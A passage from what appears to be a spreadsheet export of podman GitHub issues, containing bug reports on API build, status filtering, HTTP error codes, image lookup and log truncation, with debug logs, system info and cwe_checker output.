swapFree: 0 swapTotal: 0 uptime: 40h 43m 52.05s (Approximately 1.67 days) plugins: log: - k8s-file - none - passthrough - journald network: - bridge - macvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io - quay.io store: configFile: /usr/share/containers/storage.conf containerStore: number: 11 paused: 0 running: 11 stopped: 0 graphDriverName: overlay graphOptions: overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphStatus: Backing Filesystem: xfs Native Overlay Diff: "false" Supports d_type: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 8 runRoot: /run/containers/storage volumePath: /var/lib/containers/storage/volumes version: APIVersion: 4.0.2 Built: 1646319369 BuiltTime: Thu Mar 3 14:56:09 2022 GitCommit: "" GoVersion: go1.18beta2 OsArch: linux/amd64 Version: 4.0.2 </t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/13831</t>
  </si>
  <si>
    <t>API build: remote parameter does not work</t>
  </si>
  <si>
    <t>I'm trying to build a docker file from my [repository](https://github.com/matheusfenolio/poc), but I'm receiving an error when I call the endpoint `curl -X POST http://localhost:8080/v2.0.0/libpod/build?remote=https%3A%2F%2Fgithub.com%2Fmatheusfenolio%2Fpoc` json { "cause": "stat /var/tmp/libpod_builder4161196413/build/Containerfile: no such file or directory", "message": "failed to parse query parameter 'dockerfile': \"Dockerfile\": stat /var/tmp/libpod_builder4161196413/build/Containerfile: no such file or directory", "response": 400 }{ "errorDetail": { "message": "stat /var/tmp/libpod_builder4161196413/build/Dockerfile: no such file or directory\n" }, "error": "stat /var/tmp/libpod_builder4161196413/build/Dockerfile: no such file or directory\n" }  API reference: https://docs.podman.io/en/v3.2.3/_static/api.html#operation/ImageBuildLibpod</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/13986</t>
  </si>
  <si>
    <t>Cannot filter containers for `removing` status in API</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** Cannot filter for `removing` status in API. It looks like `restarting` is missing too, haven't tried other statuses. `is-task` seems to be a wrongfully invalid filter as well **Steps to reproduce the issue:** curl -g --unix-socket /run/podman/podman.sock 'http://d/v4.0.0/libpod/containers/json?filters={"status":["removing"]}' **Describe the results you received:** `{"cause":"removing is not a valid status","message":"removing is not a valid status","response":500}` **Describe the results you expected:** According to the docs this is a valid status: https://docs.podman.io/en/v4.0.0/_static/api.html#operation/ContainerListLibpod **Output of `podman version`:**  Client: Podman Engine Version: 4.0.3 API Version: 4.0.3 Go Version: go1.18 Git Commit: 62534053086fdeba7b93117e7c4dc6e797835a3e Built: Mon Apr 4 05:54:02 2022 OS/Arch: linux/amd64 </t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/14208</t>
  </si>
  <si>
    <t>Image conflict should return HTTP 409</t>
  </si>
  <si>
    <t>&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind feature **Description** &lt;!-- Briefly describe the problem you are having in a few paragraphs. --&gt; **Steps to reproduce the issue:** 1. Attempt to delete image which is still being used by a container using `DELETE /images/sha256:xxxx` **Describe the results you received:** API returns HTTP 500. **Describe the results you expected:** Given the Docker API returns the more appropriate HTTP 409 (CONFLICT), I expected Podman to return 409 as well. **Additional information you deem important (e.g. issue happens only occasionally):** I think it would not only be more appropriate to use a HTTP response with the matching description, but I too think it would help compatibility with Docker API clients. In my case I am using the Docker Java API, which would return a appropriate conflict exception on Docker's 409 response, whereas Podman's 500 results in a very generic server error.</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/14291</t>
  </si>
  <si>
    <t>Podman's Docker-compatible REST API and previously pulled images.</t>
  </si>
  <si>
    <t>/kind bug **Description** Since podman 4, when using the Docker-compatible REST API, trying to start a container that was previously pulled fails because the container does not exist on Docker Hub. More precisely I get a 404 for docker.io/library/NAME:TAG. This issue is fixed by setting `compat_api_enforce_docker_hub` to `false`. I can also report that Docker is perfectly happy with starting the containers with the same API request. This was originally discussed [here](https://github.com/containers/podman/issues/12320#issuecomment-1131537455) **Steps to reproduce the issue:** 1. Login to a private registry 2. Pull a container 3. Logout from the registry 4. Try to start the container using the Docker-compatible REST API **Describe the results you received:** 404 on `docker.io/library/NAME:TAG` Please note that I removed the environment variables sections of the requests.  # podman --version podman version 4.0.2 # podman --log-level=debug system service -t 0 tcp:0.0.0.0:2376 INFO[0000] podman filtering at log level debug DEBU[0000] Called service.PersistentPreRunE(podman --log-level=debug system service -t 0 tcp:0.0.0.0:2376) DEBU[0000] Merged system config "/usr/share/containers/containers.conf" DEBU[0000] Merged system config "/etc/containers/containers.conf" DEBU[0000] Using conmon: "/usr/bin/conmon" DEBU[0000] Initializing boltdb state at /var/lib/containers/storage/libpod/bolt_state.db DEBU[0000] Using graph driver overlay DEBU[0000] Using graph root /var/lib/containers/storage DEBU[0000] Using run root /run/containers/storage DEBU[0000] Using static dir /var/lib/containers/storage/libpod DEBU[0000] Using tmp dir /run/libpod DEBU[0000] Using volume path /var/lib/containers/storage/volumes DEBU[0000] Set libpod namespace to "" DEBU[0000] [graphdriver] trying provided driver "overlay" DEBU[0000] Cached value indicated that overlay is supported DEBU[0000] Cached value indicated that metacopy is being used DEBU[0000] Cached value indicated that native-diff is not being used INFO[0000] Not using native diff for overlay, this may cause degraded performance for building images: kernel has CONFIG_OVERLAY_FS_REDIRECT_DIR enabled DEBU[0000] backingFs=xfs, projectQuotaSupported=false, useNativeDiff=false, usingMetacopy=true DEBU[0000] Initializing event backend file DEBU[0000] Configured OCI runtime runsc initialization failed: no valid executable found for OCI runtime runsc: invalid argument DEBU[0000] Configured OCI runtime krun initialization failed: no valid executable found for OCI runtime krun: invalid argument DEBU[0000] Configured OCI runtime kata initialization failed: no valid executable found for OCI runtime kata: invalid argument DEBU[0000] Using OCI runtime "/usr/bin/runc" INFO[0000] Setting parallel job count to 25 DEBU[0000] registered SIGHUP watcher for config DEBU[0000] CORS Headers were not set INFO[0000] API service listening on "[::]:2376" DEBU[0000] waiting for SIGHUP to reload configuration DEBU[0000] API service(s) shutting down, idle for 0s DEBU[0000] API service shutdown request ignored as timeout Duration is UnlimitedService DEBU[0020] IdleTracker:new 0m+0h/0t connection(s) X-Reference-Id=0xc000011318 DEBU[0020] IdleTracker:new 0m+0h/1t connection(s) X-Reference-Id=0xc000011320 DEBU[0020] IdleTracker:active 0m+0h/2t connection(s) X-Reference-Id=0xc000011320 DEBU[0020] IdleTracker:active 1m+0h/2t connection(s) X-Reference-Id=0xc000011318 DEBU[0020] Looking up image "NAME:TAG" in local containers storage DEBU[0020] Normalized platform linux/amd64 to {amd64 linux [] } DEBU[0020] Trying "NAME:TAG"  DEBU[0020] Loading registries configuration "/etc/containers/registries.conf" DEBU[0020] Looking up image "NAME:TAG" in local containers storage DEBU[0020] Normalized platform linux/amd64 to {amd64 linux [] } DEBU[0020] Trying "NAME:TAG"  DEBU[0020] Loading registries configuration "/etc/containers/registries.conf.d/000-shortnames.conf" DEBU[0020] Loading registries configuration "/etc/containers/registries.conf.d/001-rhel-shortnames.conf" DEBU[0020] Loading registries configuration "/etc/containers/registries.conf.d/002-rhel-shortnames-overrides.conf" DEBU[0020] Trying "localhost/NAME:TAG"  DEBU[0020] Trying "registry.fedoraproject.org/NAME:TAG"  DEBU[0020] Trying "localhost/NAME:TAG"  DEBU[0020] Trying "registry.access.redhat.com/NAME:TAG"  DEBU[0020] Trying "registry.fedoraproject.org/NAME:TAG"  DEBU[0020] Trying "registry.centos.org/NAME:TAG"  DEBU[0020] Trying "docker.io/library/NAME:TAG"  DEBU[0020] Trying "registry.access.redhat.com/NAME:TAG"  DEBU[0020] Trying "docker.io/library/NAME:TAG"  DEBU[0020] Trying "registry.centos.org/NAME:TAG"  DEBU[0020] Trying "docker.io/library/NAME:TAG"  DEBU[0020] Trying "REGISTRY/PATH/NAME:TAG"  DEBU[0020] Trying "docker.io/library/NAME:TAG"  DEBU[0020] parsed reference into "[overlay@/var/lib/containers/storage+/run/containers/storage:overlay.mountopt=nodev,metacopy=on]@5fb70826285b943f31f0c4b0dc0247d29177941c6e01a99b188bdda633244892" DEBU[0020] Found image "NAME:TAG" as "REGISTRY/PATH/NAME:TAG" in local containers storage DEBU[0020] Trying "REGISTRY/PATH/NAME:TAG"  DEBU[0020] parsed reference into "[overlay@/var/lib/containers/storage+/run/containers/storage:overlay.mountopt=nodev,metacopy=on]@5fb70826285b943f31f0c4b0dc0247d29177941c6e01a99b188bdda633244892" DEBU[0020] Found image "NAME:TAG" as "REGISTRY/PATH/NAME:TAG" in local containers storage DEBU[0020] Found image "NAME:TAG" as "REGISTRY/PATH/NAME:TAG" in local containers storage ([overlay@/var/lib/containers/storage+/run/containers/storage:overlay.mountopt=nodev,metacopy=on]@5fb70826285b943f31f0c4b0dc0247d29177941c6e01a99b188bdda633244892) DEBU[0020] Looking up image "docker.io/library/NAME:TAG" in local containers storage DEBU[0020] Normalized platform linux/amd64 to {amd64 linux [] } DEBU[0020] Trying "docker.io/library/NAME:TAG"  DEBU[0020] Found image "NAME:TAG" as "REGISTRY/PATH/NAME:TAG" in local containers storage ([overlay@/var/lib/containers/storage+/run/containers/storage:overlay.mountopt=nodev,metacopy=on]@5fb70826285b943f31f0c4b0dc0247d29177941c6e01a99b188bdda633244892) DEBU[0020] Trying "docker.io/library/NAME:TAG"  DEBU[0020] Trying "docker.io/library/NAME:TAG"  DEBU[0020] Looking up image "docker.io/library/NAME:TAG" in local containers storage DEBU[0020] Normalized platform linux/amd64 to {amd64 linux [] } DEBU[0020] Trying "docker.io/library/NAME:TAG"  DEBU[0020] Trying "docker.io/library/NAME:TAG"  INFO[0020] Request Failed(Not Found): No such image: docker.io/library/NAME:TAG: image not known DEBU[0020] Trying "docker.io/library/NAME:TAG"  INFO[0020] Request Failed(Not Found): No such image: docker.io/library/NAME:TAG: image not known 34.74.239.56 - - [19/May/2022:11:31:19 +0000] "POST /containers/create?Image=NAME%3ATAG&amp;Tty=true&amp;Cmd=%5B%22%2Fopt%2Fbin%2Fentry_point.sh%22%5D&amp;HostConfig=%7B%22Privileged%22%3Atrue%2C%22Binds%22%3A%5B%22%2Fdev%2Fshm%3A%2Fdev%2Fshm%22%2C%22%2Fdata%2Fvideo%3A%2Fvideo%22%2C%22%2Fdata%2Fbrowsers%3A%2Fbrowsers%22%5D%7D&amp;name=overconfident-wish-2&amp;Env=REMOVED_BY_PETER HTTP/1.1" 404 133 "" "" 34.74.239.56 - - [19/May/2022:11:31:19 +0000] "POST /containers/create?Image=NAME%3ATAG&amp;Tty=true&amp;Cmd=%5B%22%2Fopt%2Fbin%2Fentry_point.sh%22%5D&amp;HostConfig=%7B%22Privileged%22%3Atrue%2C%22Binds%22%3A%5B%22%2Fdev%2Fshm%3A%2Fdev%2Fshm%22%2C%22%2Fdata%2Fvideo%3A%2Fvideo%22%2C%22%2Fdata%2Fbrowsers%3A%2Fbrowsers%22%5D%2C%22PortBindings%22%3A%7B%225900%2Ftcp%22%3A%5B%7B%22HostPort%22%3A%225900%22%7D%5D%2C%229229%2Ftcp%22%3A%5B%7B%22HostPort%22%3A%229229%22%7D%5D%7D%7D&amp;name=overconfident-wish-1&amp;Env=REMOVED_BY_PETER HTTP/1.1" 404 133 "" "" DEBU[0020] IdleTracker:closed 2m+0h/2t connection(s) X-Reference-Id=0xc000011320 DEBU[0020] IdleTracker:closed 1m+0h/2t connection(s) X-Reference-Id=0xc000011318  **Describe the results you expected:** The container should start as it is found on local storage. **Additional information you deem important (e.g. issue happens only occasionally):** **Output of `podman version`:**  podman version 4.0.2  **Output of `podman info --debug`:**  host: arch: amd64 buildahVersion: 1.24.1 cgroupControllers: - cpuset - cpu - io - memory - hugetlb - pids - rdma cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.0-1.module_el8.6.0+2877+8e437bf5.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.0, commit: edfc4e28654b9f8e3597bb8f87c6af099a50261f' cpus: 8 distribution: distribution: '"spearlineos"' version: "8.6" eventLogger: file hostname: peter-from-image1 idMappings: gidmap: null uidmap: null kernel: 4.18.0-372.9.1.el8.x86_64 linkmode: dynamic logDriver: k8s-file memFree: 4423311360 memTotal: 8340979712 networkBackend: cni ociRuntime: name: runc package: runc-1.0.3-1.module_el8.6.0+2877+8e437bf5.x86_64 path: /usr/bin/runc version: |- runc version 1.0.3 spec: 1.0.2-dev go: go1.17.7 libseccomp: 2.5.2 os: linux remoteSocket: path: /run/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_NET_RAW,CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.1.8-2.module_el8.6.0+2877+8e437bf5.x86_64 version: |- slirp4netns version 1.1.8 commit: d361001f495417b880f20329121e3aa431a8f90f libslirp: 4.4.0 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.2 swapFree: 2209345536 swapTotal: 2209345536 uptime: 1h 18m 47.63s (Approximately 0.04 days) plugins: log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - registry.centos.org - docker.io store: configFile: /etc/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphStatus: Backing Filesystem: xfs Native Overlay Diff: "false" Supports d_type: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 4 runRoot: /run/containers/storage volumePath: /var/lib/containers/storage/volumes version: APIVersion: 4.0.2 Built: 1652194338 BuiltTime: Tue May 10 14:52:18 2022 GitCommit: "" GoVersion: go1.17.7 OsArch: linux/amd64 Version: 4.0.2  **Package info (e.g. output of `rpm -q podman` or `apt list podman`):**  podman-4.0.2-5.module_el8.6.0+2877+8e437bf5.x86_64  **Have you tested with the latest version of Podman and have you checked the Podman Troubleshooting Guide? (https://github.com/containers/podman/blob/main/troubleshooting.md)** No **Additional environment details (AWS, VirtualBox, physical, etc.):** GCP</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/14458</t>
  </si>
  <si>
    <t>podman logs missing last line from json stdout</t>
  </si>
  <si>
    <t>/kind bug **Description** &lt;!-- Using the docker-style API or podman logs command the JSON output from a container is missing the last line leading to malformed JSON and decoding errors. This is present in podman version 4.2.0-dev and 3.4.2 --&gt; **Steps to reproduce the issue:** 1. podman pull docker.io/fkiecad/cwe_checker:stable 2. podman run fkiecad/cwe_checker:stable /bin/echo --json ERROR: instr_001022f0_2: Call target at 00102050 does not exist ERROR: instr_001022f5_2: Call target at 00102050 does not exist ERROR: instr_001022fa_2: Call target at 00102050 does not exist ERROR: instr_001022ff_2: Call target at 00102050 does not exist ERROR: instr_00102304_2: Call target at 00102050 does not exist ERROR: instr_00102309_2: Call target at 00102050 does not exist ERROR: instr_0010230e_2: Call target at 00102050 does not exist ERROR: instr_00102313_2: Call target at 00102050 does not exist ERROR: instr_00102318_2: Call target at 00102050 does not exist ERROR: instr_0010231d_2: Call target at 00102050 does not exist ERROR: instr_00102322_2: Call target at 00102050 does not exist ERROR: instr_00103070_2: Call target at 00102050 does not exist ERROR: instr_001050b0_0: Jump target at 00102327 does not exist ERROR: instr_001050b9_0: Jump target at 00102327 does not exist ERROR: instr_00105b70_2: Call target at 00102050 does not exist DEBUG: Pointer Inference @ instr_001042b2_2: Address not contained in runtime memory image DEBUG: Pointer Inference @ instr_00105963_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_00104291_0: Address not contained in runtime memory image DEBUG: Pointer Inference @ instr_00105ce4_0_r: Unexpected stack register value on return DEBUG: Pointer Inference @ instr_00104d42_0_r: Unexpected stack register value on return DEBUG: Pointer Inference @ instr_001058a0_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_00105c02_0_r: Unexpected stack register value on return DEBUG: Pointer Inference @ instr_00105778_0_r: Unexpected stack register value on return DEBUG: Pointer Inference @ instr_001043d7_0_r: Unexpected stack register value on return DEBUG: Pointer Inference @ instr_001044fe_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_00104882_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_001059e8_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_00104867_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_001048a8_2: Free on a non-pointer value called. DEBUG: Pointer Inference: Adding 4 entry points DEBUG: Pointer Inference: Blocks with state: 14 / 1109 DEBUG: Pointer Inference: Adding 60 speculative entry points DEBUG: Pointer Inference: Blocks with state: 1040 / 1109 DEBUG: Pointer Inference: Adding 0 speculative entry points DEBUG: Pointer Inference: Blocks with state: 1040 / 1109 [ { "name": "CWE676", "version": "0.1", "addresses": [ "001032a9" ], "tids": [ "instr_001032a9_2" ], "symbols": [ "FUN_00103160" ], "other": [ [ "dangerous_function", "strlen" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00103160 (001032a9) -&gt; strlen" }, { "name": "CWE676", "version": "0.1", "addresses": [ "0010335c" ], "tids": [ "instr_0010335c_2" ], "symbols": [ "FUN_00103160" ], "other": [ [ "dangerous_function", "strlen" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00103160 (0010335c) -&gt; strlen" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00103398" ], "tids": [ "instr_00103398_2" ], "symbols": [ "FUN_00103160" ], "other": [ [ "dangerous_function", "memcmp" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00103160 (00103398) -&gt; memcmp" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00103c9e" ], "tids": [ "instr_00103c9e_2" ], "symbols": [ "FUN_00103160" ], "other": [ [ "dangerous_function", "strlen" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00103160 (00103c9e) -&gt; strlen" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00104485" ], "tids": [ "instr_00104485_2" ], "symbols": [ "FUN_001043f0" ], "other": [ [ "dangerous_function", "memset" ] ], "description": "(Use of Potentially Dangerous Function) FUN_001043f0 (00104485) -&gt; memset" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105aef" ], "tids": [ "instr_00105aef_0" ], "symbols": [ "FUN_00105ac0" ], "other": [ [ "dangerous_function", "memcpy" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105ac0 (00105aef) -&gt; memcpy" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105b0a" ], "tids": [ "instr_00105b0a_2" ], "symbols": [ "FUN_00105b00" ], "other": [ [ "dangerous_function", "strlen" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105b00 (00105b0a) -&gt; strlen" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105b30" ], "tids": [ "instr_00105b30_0" ], "symbols": [ "FUN_00105b00" ], "other": [ [ "dangerous_function", "memcpy" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105b00 (00105b30) -&gt; memcpy" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105d52" ], "tids": [ "instr_00105d52_2" ], "symbols": [ "FUN_00105d30" ], "other": [ [ "dangerous_function", "strlen" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105d30 (00105d52) -&gt; strlen" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105d85" ], "tids": [ "instr_00105d85_2" ], "symbols": [ "FUN_00105d30" ], "other": [ [ "dangerous_function", "memcpy" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105d30 (00105d85) -&gt; memcpy" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105daa" ], "tids": [ "instr_00105daa_2" ], "symbols": [ "FUN_00105d30" ], "other": [ [ "dangerous_function", "memcpy" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105d30 (00105daa) -&gt; memcpy" }, { "name": "CWE125", "version": "0.2", "addresses": [ "001042b2" ], "tids": [ "instr_001042b2_2" ], "symbols": [], "other": [], "description": "(Out-of-bounds Read) Memory load at 001042b2 may be out of bounds" }, { "name": "CWE125", "version": "0.2", "addresses": [ "00104291" ], "tids": [ "instr_00104291_0" ], "symbols": [], "other": [], "description": "(Out-of-bounds Read) Memory load at 00104291 may be out of bounds" } ] 3. podman logs 90613051c45e ERROR: instr_001022f0_2: Call target at 00102050 does not exist ERROR: instr_001022f5_2: Call target at 00102050 does not exist ERROR: instr_001022fa_2: Call target at 00102050 does not exist ERROR: instr_001022ff_2: Call target at 00102050 does not exist ERROR: instr_00102304_2: Call target at 00102050 does not exist ERROR: instr_00102309_2: Call target at 00102050 does not exist ERROR: instr_0010230e_2: Call target at 00102050 does not exist ERROR: instr_00102313_2: Call target at 00102050 does not exist ERROR: instr_00102318_2: Call target at 00102050 does not exist ERROR: instr_0010231d_2: Call target at 00102050 does not exist ERROR: instr_00102322_2: Call target at 00102050 does not exist ERROR: instr_00103070_2: Call target at 00102050 does not exist ERROR: instr_001050b0_0: Jump target at 00102327 does not exist ERROR: instr_001050b9_0: Jump target at 00102327 does not exist ERROR: instr_00105b70_2: Call target at 00102050 does not exist DEBUG: Pointer Inference @ instr_001042b2_2: Address not contained in runtime memory image DEBUG: Pointer Inference @ instr_00105963_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_00104291_0: Address not contained in runtime memory image DEBUG: Pointer Inference @ instr_00105ce4_0_r: Unexpected stack register value on return DEBUG: Pointer Inference @ instr_00104d42_0_r: Unexpected stack register value on return DEBUG: Pointer Inference @ instr_001058a0_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_00105c02_0_r: Unexpected stack register value on return DEBUG: Pointer Inference @ instr_00105778_0_r: Unexpected stack register value on return DEBUG: Pointer Inference @ instr_001043d7_0_r: Unexpected stack register value on return DEBUG: Pointer Inference @ instr_001044fe_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_00104882_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_001059e8_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_00104867_2: Free on a non-pointer value called. DEBUG: Pointer Inference @ instr_001048a8_2: Free on a non-pointer value called. DEBUG: Pointer Inference: Adding 4 entry points DEBUG: Pointer Inference: Blocks with state: 14 / 1109 DEBUG: Pointer Inference: Adding 60 speculative entry points DEBUG: Pointer Inference: Blocks with state: 1040 / 1109 DEBUG: Pointer Inference: Adding 0 speculative entry points DEBUG: Pointer Inference: Blocks with state: 1040 / 1109 [ { "name": "CWE676", "version": "0.1", "addresses": [ "001032a9" ], "tids": [ "instr_001032a9_2" ], "symbols": [ "FUN_00103160" ], "other": [ [ "dangerous_function", "strlen" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00103160 (001032a9) -&gt; strlen" }, { "name": "CWE676", "version": "0.1", "addresses": [ "0010335c" ], "tids": [ "instr_0010335c_2" ], "symbols": [ "FUN_00103160" ], "other": [ [ "dangerous_function", "strlen" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00103160 (0010335c) -&gt; strlen" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00103398" ], "tids": [ "instr_00103398_2" ], "symbols": [ "FUN_00103160" ], "other": [ [ "dangerous_function", "memcmp" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00103160 (00103398) -&gt; memcmp" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00103c9e" ], "tids": [ "instr_00103c9e_2" ], "symbols": [ "FUN_00103160" ], "other": [ [ "dangerous_function", "strlen" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00103160 (00103c9e) -&gt; strlen" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00104485" ], "tids": [ "instr_00104485_2" ], "symbols": [ "FUN_001043f0" ], "other": [ [ "dangerous_function", "memset" ] ], "description": "(Use of Potentially Dangerous Function) FUN_001043f0 (00104485) -&gt; memset" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105aef" ], "tids": [ "instr_00105aef_0" ], "symbols": [ "FUN_00105ac0" ], "other": [ [ "dangerous_function", "memcpy" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105ac0 (00105aef) -&gt; memcpy" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105b0a" ], "tids": [ "instr_00105b0a_2" ], "symbols": [ "FUN_00105b00" ], "other": [ [ "dangerous_function", "strlen" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105b00 (00105b0a) -&gt; strlen" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105b30" ], "tids": [ "instr_00105b30_0" ], "symbols": [ "FUN_00105b00" ], "other": [ [ "dangerous_function", "memcpy" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105b00 (00105b30) -&gt; memcpy" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105d52" ], "tids": [ "instr_00105d52_2" ], "symbols": [ "FUN_00105d30" ], "other": [ [ "dangerous_function", "strlen" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105d30 (00105d52) -&gt; strlen" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105d85" ], "tids": [ "instr_00105d85_2" ], "symbols": [ "FUN_00105d30" ], "other": [ [ "dangerous_function", "memcpy" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105d30 (00105d85) -&gt; memcpy" }, { "name": "CWE676", "version": "0.1", "addresses": [ "00105daa" ], "tids": [ "instr_00105daa_2" ], "symbols": [ "FUN_00105d30" ], "other": [ [ "dangerous_function", "memcpy" ] ], "description": "(Use of Potentially Dangerous Function) FUN_00105d30 (00105daa) -&gt; memcpy" }, { "name": "CWE125", "version": "0.2", "addresses": [ "001042b2" ], "tids": [ "instr_001042b2_2" ], "symbols": [], "other": [], "description": "(Out-of-bounds Read) Memory load at 001042b2 may be out of bounds" }, { "name": "CWE125", "version": "0.2", "addresses": [ "00104291" ], "tids": [ "instr_00104291_0" ], "symbols": [], "other": [], "description": "(Out-of-bounds Read) Memory load at 00104291 may be out of bounds" } **Describe the results you received:** The stdout from the run command shows the last line with the "]", however the logs command is missing the "]". If I do the same thing with docker the logs command is not missing the last line. **Describe the results you expected:** I expected the logs command to provide the last line of the stdout. **Additional information you deem important (e.g. issue happens only occasionally):** Issue is always reproducible. **Output of `podman version`:**  podman --version podman version 3.4.2 Also: podman --version podman version 4.2.0-dev followed the source install method on podman.io for 4.2.0. Reverted back to 3.4.2 after seeing same results on latest source.  **Output of `podman info --debug`:**  podman info --debug host: arch: amd64 buildahVersion: 1.23.1 cgroupControllers: - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: 'conmon: /usr/libexec/podman/conmon' path: /usr/libexec/podman/conmon version: 'conmon version 2.0.30, commit: ' cpus: 8 distribution: codename: focal distribution: ubuntu version: "20.04" eventLogger: journald hostname: bryce-VirtualBox idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 kernel: 5.13.0-44-generic linkmode: dynamic logDriver: journald memFree: 25507426304 memTotal: 39464538112 ociRuntime: name: crun package: 'crun: /usr/bin/crun' path: /usr/bin/crun version: |- crun version UNKNOWN commit: ea1fe3938eefa14eb707f1d22adff4db670645d6 spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +YAJL os: linux remoteSocket: exists: true path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: 'slirp4netns: /usr/bin/slirp4netns' version: |- slirp4netns version 1.1.8 commit: unknown libslirp: 4.3.1-git SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.4.3 swapFree: 2147479552 